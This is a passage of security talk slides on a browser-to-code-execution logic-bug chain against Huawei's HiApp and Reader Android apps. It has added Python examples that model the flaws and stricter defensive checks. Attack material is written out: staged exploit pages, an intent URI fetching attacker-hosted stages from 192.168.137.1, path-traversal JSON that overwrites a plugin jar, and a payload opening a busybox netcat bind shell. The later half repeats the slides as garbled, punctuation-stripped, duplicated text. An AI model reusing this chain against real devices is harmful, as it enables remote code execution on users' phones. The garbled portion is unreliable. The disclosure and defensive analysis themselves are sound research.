                    continue;
                }
                …

The patterns are anchored only at the end and say nothing about the scheme, so a plain-HTTP URL on a whitelisted host (such as the http://www.vmall.com:8000/stage2.html used in stage 1 below) passes the check and can be served by whoever controls the network.
HiApp – stage1.html (CVE-2018-7931)
    document.location = 'hiapp://com.huawei.appmarket?activityName=activityUri|webview.activity&params={"params":[{"name":"uri","type":"String","value":"internal_webview"},{"name":"url","type":"String","value":"http://www.vmall.com:8000/stage2.html"}]}&channelId=1';

Stage 1: Browse to Website on Device → BROWSABLE Intent – WebView → Code Exec and Profit
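The whitelist above only looks at how the host string ends. The Python below is an added example written for this page, not code from the talk or from HiApp: it re-creates the check with the three regexes from the decompiled b() method and puts a stricter parsed-URL check beside it. Matching the regexes against the URL's hostname is an assumption about how the app applied them; the URL strings are constructed.

```python
"""Added example (not from the MWR slides or HiApp): the suffix-only
whitelist from the decompiled b() method beside a stricter check.
Applying the regexes to the parsed hostname is an assumption."""
import re
from urllib.parse import urlsplit

# The three patterns added to the list in b().
WHITELIST = ["hicloud.com$", "vmall.com$", "huawei.com$"]
ALLOWED_DOMAINS = ["hicloud.com", "vmall.com", "huawei.com"]


def hiapp_style_allowed(url):
    """Reconstruction of the slide's check: suffix-anchored regexes against
    the host. '.' is unescaped, nothing anchors the start, and the scheme
    is never examined."""
    host = urlsplit(url).hostname or ""
    return any(re.search(pattern, host) for pattern in WHITELIST)


def strict_allowed(url):
    """Require https and an exact allowed domain or a real subdomain of it."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)


def compare(url):
    """Return (hiapp_style_allowed, strict_allowed) for one URL."""
    return hiapp_style_allowed(url), strict_allowed(url)


if __name__ == "__main__":
    # Constructed URLs: the stage-1 URL from the slides plus lookalike hosts.
    for u in ["https://www.vmall.com/",
              "http://www.vmall.com:8000/stage2.html",   # plain HTTP passes the regex
              "https://attacker-vmall.com/",             # no start anchor
              "https://vmallxcom/"]:                     # unescaped '.'
        print(u, compare(u))
```

The two lookalike hosts show why a regex list is the wrong tool here: a host whitelist needs a parsed hostname, an exact or dot-separated suffix match, and a scheme requirement, each of which the three patterns leave out.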
HiApp – JavaScript Bridge (CVE-2018-7932)
    this.webview.getSettings().setJavaScriptEnabled(true);
    this.webview.requestFocus();
    this.webview.setWebViewClient(new InternalWebViewClient(this));
    this.webview.setWebChromeClient(new MarketWebChromeClient(this));
    this.webview.getSettings().setBlockNetworkImage(true);
    this.webview.addJavascriptInterface(new HiSpaceObject(this.mContext, ((JsCallBackOjbect)this), this.webview), "HiSpaceObject");

    @JavascriptInterface
    public void launchApp(String arg7, String arg8) {
        URISyntaxException v1_1;
        v0_1 = Intent.parseUri(arg8, 0);
        try {
            v0_1.setPackage(arg7);
            this.mActivity.startActivity(v0_1);

Any page loaded in this WebView can therefore build an arbitrary Intent (action, component, extras) from a string and have HiApp start it on its behalf.
android-app:// URI scheme
http://androidxref.com/8.0.0_r4/xref/frameworks/base/core/java/android/content/Intent.java

    android-app://package_id[/scheme[/host[/path]]][#Intent;…;end]

    android-app://com.example.app/#Intent;action=com.example.MY_ACTION;i.some_int=100;S.some_str=hello;end

    Action:  com.example.MY_ACTION
    Package: com.example.app
    Extras:  some_int=(int)100, some_str=(String)hello
HiApp – stage2.html (CVE-2018-7932)
    var pkg = "com.huawei.hwireader";
    var uri = "android-app://http://www.google.co.uk/#Intent;" +
              "component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;" +
              "action=com.huawei.hwireader.SHOW_DETAILS;" +
              "S.url=http://192.168.137.1:8000/stage3.html;end";
    window.HiSpaceObject.launchApp(pkg, uri);

The explicit component targets the Reader's ActivityWeb, and the url string extra (S.url in intent-URI syntax) is what that activity reads with getStringExtra("url") and loads into its own WebView.

Stage 2: Browse to Website on Device → BROWSABLE Intent – WebView → Exported Intent – WebView → Code Exec and Profit
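What launchApp() turns that string into is easiest to see by parsing it. Below is an added example, not the talk's code and not Android's: a minimal Python parser for the #Intent;…;end syntax quoted from Intent.java above, covering action, component, package, category and S./i./B. extras, plus the setPackage() step launchApp() performs. It does not split the android-app:// data part into package/scheme/host the way the real parser does, and it knows only those three extra types. The sample URIs are constructed to mirror the slides.

```python
"""Added example (not from the talk or from Android): a minimal parser for
the '<data>#Intent;key=value;...;end' syntax shown on the android-app slide,
and the setPackage() step HiSpaceObject.launchApp() adds on top of it."""
from urllib.parse import unquote

INTENT_MARK = "#Intent;"
ACTION_VIEW = "android.intent.action.VIEW"


def _blank(data):
    return {"data": data, "action": ACTION_VIEW, "component": None,
            "package": None, "categories": [], "extras": {}}


def parse_intent_uri(uri):
    """Return a dict with data, action, component, package, categories and
    extras ({name: (type, value)}). Simplified: the android-app:// data part
    is kept as a string rather than split into package/scheme/host."""
    mark = uri.rfind(INTENT_MARK)
    if mark == -1:
        # No intent fragment: parseUri() yields a plain VIEW intent on the URI.
        return _blank(uri)
    intent = _blank(uri[:mark] or None)
    fields = uri[mark + len(INTENT_MARK):].split(";")
    if fields[-1] != "end":
        raise ValueError("intent URI must terminate with ';end'")
    for field in fields[:-1]:
        if not field:
            continue
        key, sep, value = field.partition("=")
        if not sep:
            raise ValueError("malformed field: %r" % field)
        value = unquote(value)
        if key == "action":
            intent["action"] = value
        elif key == "component":
            intent["component"] = value
        elif key == "package":
            intent["package"] = value
        elif key == "category":
            intent["categories"].append(value)
        elif key.startswith("S."):
            intent["extras"][unquote(key[2:])] = ("String", value)
        elif key.startswith("i."):
            intent["extras"][unquote(key[2:])] = ("int", int(value))
        elif key.startswith("B."):
            intent["extras"][unquote(key[2:])] = ("boolean", value == "true")
        else:
            # Intent.parseUri() throws URISyntaxException for an extra with no
            # type prefix, so a bare 'url=' would never reach startActivity().
            raise ValueError("unknown key or untyped extra: %r" % key)
    return intent


def launch_app(package, uri):
    """Mirror of launchApp(): Intent.parseUri(uri, 0) then setPackage(package)."""
    intent = parse_intent_uri(uri)
    intent["package"] = package
    return intent


def is_well_formed(uri):
    """True when parse_intent_uri() accepts the string."""
    try:
        parse_intent_uri(uri)
    except ValueError:
        return False
    return True


# Constructed to mirror stage2.html and the Intent.java documentation example.
STAGE2_URI = ("android-app://http://www.google.co.uk/#Intent;"
              "component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;"
              "action=com.huawei.hwireader.SHOW_DETAILS;"
              "S.url=http://192.168.137.1:8000/stage3.html;end")
DOC_EXAMPLE = ("android-app://com.example.app/#Intent;action=com.example.MY_ACTION;"
               "i.some_int=100;S.some_str=hello;end")

if __name__ == "__main__":
    print(launch_app("com.huawei.hwireader", STAGE2_URI))
```

Run against STAGE2_URI the result is an explicit intent for the Reader's ActivityWeb carrying the attacker's url extra, which is exactly the object a JavaScript bridge should never let a web page assemble.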
Huawei Reader Application

Huawei Reader – Input Validation (CVE-2017-15308)
    protected void onCreate(Bundle arg8) {
        CharSequence v0_1;
        String v0;
        CharSequence v1 = null;
        super.onCreate(arg8);
        Intent v2 = this.getIntent();
        if(v2 != null) {
            Uri v3 = v2.getData();
            if(v3 != null) {
                v0 = v3.getScheme();
            }
            else {
                v0_1 = v1;
            }
            v0 = v2.getStringExtra("url");
            if(TextUtils.isEmpty(((CharSequence)v0))) {
                goto label_51;
            }
            this.loadRefreshUrl(v0);

The url extra is loaded without any validation, and the WebView it lands in exposes a JavaScript bridge:

    @JavascriptInterface
    public void do_command(String arg9) {
        …
        String v4 = ((JSONObject)v2_3).getString("Action");
        LOG.I("js actionName" + v4);
        JSONObject v5 = ((JSONObject)v2_3).getJSONObject("Data");
        if(v4.equalsIgnoreCase("onlineReader")) {
            JSProtocol.mJSBookProtocol.online(v5);
            return;
        }
        if(v4.equalsIgnoreCase("readNow")) {
            JSProtocol.mJSBookProtocol.readNow(v5);
            return;
        }
Huawei Reader – Arbitrary Write / Directory Traversal (CVE-2017-15309)
    public void originalDownload(JSONObject arg19, boolean arg20, boolean arg21) {
        …
        v8 = 0;
        v10 = v4;
        v4_1 = 0;
        try {
            int v13 = v7.getInt("Type");
            v14 = v7.optInt("Version");
            v15 = v7.optBoolean("getDrmAuth", true);
            v3 = PATH.getBookDir() + v7.getString("FileName");
            v2 = v7.getInt("FileId");
            v6 = v7.getString("DownloadUrl");

FileName comes straight from the page's JSON and is concatenated onto the book directory with no check for "..", so the downloaded file can be written anywhere the app can reach on external storage.
    function download_plugin() {
        var json = '{"Action":"onlineReader","Data":{"ChargingFeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0,' +
                   '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":32532639,"FileName":"../plugins/DFService/classes.jar",' +
                   '"FileSize":10000000,"Ebk3DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/4aaaaaa9q84q87reertw35wy5/test.zip",' +
                   '"DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/k4aaaaaaertw35wy5/test.zip","Version":2}}}';
        window.ZhangYueJS.do_command(json);
    }

Stage 3: Browse to Website on Device → BROWSABLE Intent – WebView → Exported Intent – WebView → File Write → Code Exec and Profit
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
    public boolean onChapPack(JSONObject arg10) {
        boolean v0_2;
        try {
            int v3 = arg10.getInt("StartIndex");
            int v4 = arg10.getInt("EndIndex");
            String v2 = arg10.getString("Price");
            int v1 = arg10.getInt("BookId");
            String v5 = arg10.getString("PayURL");
            String v0_1 = arg10.getString("DownloadURL");
            String v7 = PATH.getBookDir() + arg10.getString("FileName");
            if((FILE.isExist(PATH.getBookNameCheckOpenFail(v7))) && Device.getNetType() != 0xFFFFFFFF) {
                FILE.delete(PATH.getBookCachePathNamePostfix(v7));
                FILE.delete(v7);

    public static String getBookNameCheckOpenFail(String arg2) {
        return PATH.getOpenFailDir() + MD5.getMD5(arg2);
    }

    public static String getOpenFailDir() {
        return PATH.getWorkDir() + "books/openfail/";
    }

Again FileName is concatenated without a traversal check. The delete only fires when a marker file named after the MD5 of the target path already exists under books/openfail/; with the arbitrary write above the attacker can create exactly that file, then have the existing plugin jar removed:

    5457bea93d0548a4d84357308df45322 = MD5 of the FileName-derived path ending in plugins/DFService/classes.jar
    /sdcard/HWiReader/books/openfail/5457bea93d0548a4d84357308df45322   (marker: must exist)
    /sdcard/HWiReader/books/../plugins/DFService/classes.jar             (file deleted)
Huawei Reader – Insecure Plugin Loading
    public static Class loadPlug(Context arg4, String arg5, String arg6) throws Exception {
        return new DexClassLoader(arg5, arg4.getApplicationInfo().dataDir, null, arg4.getClassLoader()).loadClass(arg6);
    }

    protected final ArrayList P() {
        if(pR == null) {
            try {
                PlatForm v3 = new PlatForm();
                Object v2 = Util.loadPlug(APP.getAppContext(), v3.getPlugDir("DFService") + "classes.jar",
                                          "com.zhangyue.iReader.PlugService.DocFeature").newInstance();
                v2.setPlatform(((IPlatform)v3));
                pR = ((IPlugDFService)v2);

The plugin directory is on external storage (/sdcard/HWiReader/plugins/DFService/), which the app has just been made to write into, and nothing checks the jar's signature or digest before DexClassLoader loads it and instantiates DocFeature. Whatever is in classes.jar runs with the Reader's UID.
    function download_plugin() {
        document.writeln("++ Downloading replacement classes.jar ++");
        // It should be noted that FileId needs to be unique for the download to work correctly
        var json = '{"Action":"onlineReader","Data":{"ChargingFeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0,' +
                   '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":' + PLUGIN_FILE_ID + ',' +
                   '"FileName":"../plugins/DFService/classes.jar","FileSize":10000000,' +
                   '"Ebk3DownloadUrl":"' + PLUGIN_URI + '","DownloadUrl":"' + PLUGIN_URI + '","Version":2}}}';
        window.ZhangYueJS.do_command(json);
    }
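The Reader part of the chain is all file-system logic: a FileName from page JSON concatenated onto the book directory (the traversal write behind CVE-2017-15309, reused to plant the marker for the delete in CVE-2017-15310) and a plugin jar loaded from that same external storage with no integrity check. Below is an added example, not code from the talk or from the Reader app, that models those steps in Python beside the checks that would have stopped them: a resolver that refuses names escaping the book directory, the books/openfail/<MD5(path)> marker that onChapPack() tests, and a pinned-digest check before a jar is handed to a class loader. The /sdcard/HWiReader layout follows the slides; the JSON message, the jar bytes and the pinned digest are constructed here, and the MD5 value on the slide is not reproduced because the exact string that was hashed is not recoverable from this export.

```python
"""Added example (not from the talk or the Huawei Reader app): the Reader
chain's file-system logic and the checks it lacked. Paths follow the
/sdcard/HWiReader layout on the slides; the JSON message, jar bytes and
pinned digest are constructed for the example."""
import hashlib
import json
import posixpath

WORK_DIR = "/sdcard/HWiReader/"              # PATH.getWorkDir()
BOOK_DIR = WORK_DIR + "books/"               # PATH.getBookDir()
OPENFAIL_DIR = WORK_DIR + "books/openfail/"  # PATH.getOpenFailDir()


def vulnerable_book_path(file_name):
    """PATH.getBookDir() + FileName as in originalDownload(): plain
    concatenation. normpath shows where the kernel will really put it."""
    return posixpath.normpath(BOOK_DIR + file_name)


def safe_book_path(file_name):
    """Resolve the name under BOOK_DIR and refuse anything that escapes it
    (absolute names, or '..' that climbs above the book directory)."""
    root = posixpath.normpath(BOOK_DIR)
    candidate = posixpath.normpath(posixpath.join(root, file_name))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("FileName escapes the book directory: %r" % file_name)
    return candidate


def escapes_book_dir(file_name):
    """True when safe_book_path() rejects the name."""
    try:
        safe_book_path(file_name)
    except ValueError:
        return True
    return False


def openfail_marker(book_path):
    """PATH.getBookNameCheckOpenFail(): the marker whose existence makes
    onChapPack() delete book_path. The attacker plants it with the same
    traversal write, named after the MD5 of the path to be deleted."""
    return OPENFAIL_DIR + hashlib.md5(book_path.encode("utf-8")).hexdigest()


def download_target(raw_json, resolver):
    """Take FileName from a do_command() 'onlineReader' message, the way
    online() -> originalDownload() does, and resolve it with `resolver`."""
    msg = json.loads(raw_json)
    if msg.get("Action", "").lower() != "onlinereader":
        raise ValueError("unsupported Action")
    return resolver(msg["Data"]["DownloadInfo"]["FileName"])


def plugin_ok_to_load(jar_bytes, pinned_sha256):
    """The check Util.loadPlug() lacks: compare the jar's SHA-256 with a
    digest pinned in the APK before handing it to DexClassLoader."""
    return hashlib.sha256(jar_bytes).hexdigest() == pinned_sha256


# Constructed message with the field layout of the slides' download_plugin().
ATTACKER_JSON = json.dumps({
    "Action": "onlineReader",
    "Data": {
        "ChargingFeeType": 0, "OrderUrl": "http://192.168.137.1:8001/aaaaa", "Price": 0,
        "DownloadInfo": {
            "ChapterId": 1, "FeeUnit": 10, "Type": 1, "FileId": 32532639,
            "FileName": "../plugins/DFService/classes.jar", "FileSize": 10000000,
            "Ebk3DownloadUrl": "http://192.168.137.1:8000/classes.jar",
            "DownloadUrl": "http://192.168.137.1:8000/classes.jar", "Version": 2,
        },
    },
})
# Stand-in for the vendor's classes.jar and the digest an APK would pin.
GENUINE_JAR = b"PK\x03\x04 constructed stand-in for the vendor's classes.jar"
PINNED_SHA256 = hashlib.sha256(GENUINE_JAR).hexdigest()

if __name__ == "__main__":
    print("vulnerable write lands at:", download_target(ATTACKER_JSON, vulnerable_book_path))
    print("strict resolver rejects it:", escapes_book_dir("../plugins/DFService/classes.jar"))
    print("marker for that path:", openfail_marker(BOOK_DIR + "../plugins/DFService/classes.jar"))
    print("attacker jar accepted:", plugin_ok_to_load(b"attacker classes.jar", PINNED_SHA256))
```

Either check on its own breaks the chain: the resolver stops the jar from being written, and the digest check stops a planted jar from being loaded even if the write succeeds. Loading plugins from app-private storage rather than /sdcard would remove the third ingredient, the writable plugin directory, altogether.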
Huawei Reader – Payload Creation
    package com.zhangyue.iReader.PlugService;

    import android.util.Log;
    import java.io.IOException;

    public class DocFeature {
        public DocFeature() {
            Log.e("ATTACKER", "RUNNING ARBITRARY CODE");
            // bind shell on TCP 5555 using a busybox copy in the app's data directory
            String cmd = "/data/data/com.huawei.hwireader/busybox nc -l -p 5555 -e /data/data/com.huawei.hwireader/busybox sh";
            try {
                Runtime.getRuntime().exec(cmd);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
Demo

Questions

Credits
• Georgi Geshev, Rob Miller – https://labs.mwrinfosecurity.com/publications/logic-bug-hunting-in-chrome-on-android/

Whitepaper
• Full whitepaper can be found on the MWR Labs website (https://labs.mwrinfosecurity.com/publications/)
PUBLIC
Bug Hunting Approach
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Browser attack surface
12
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
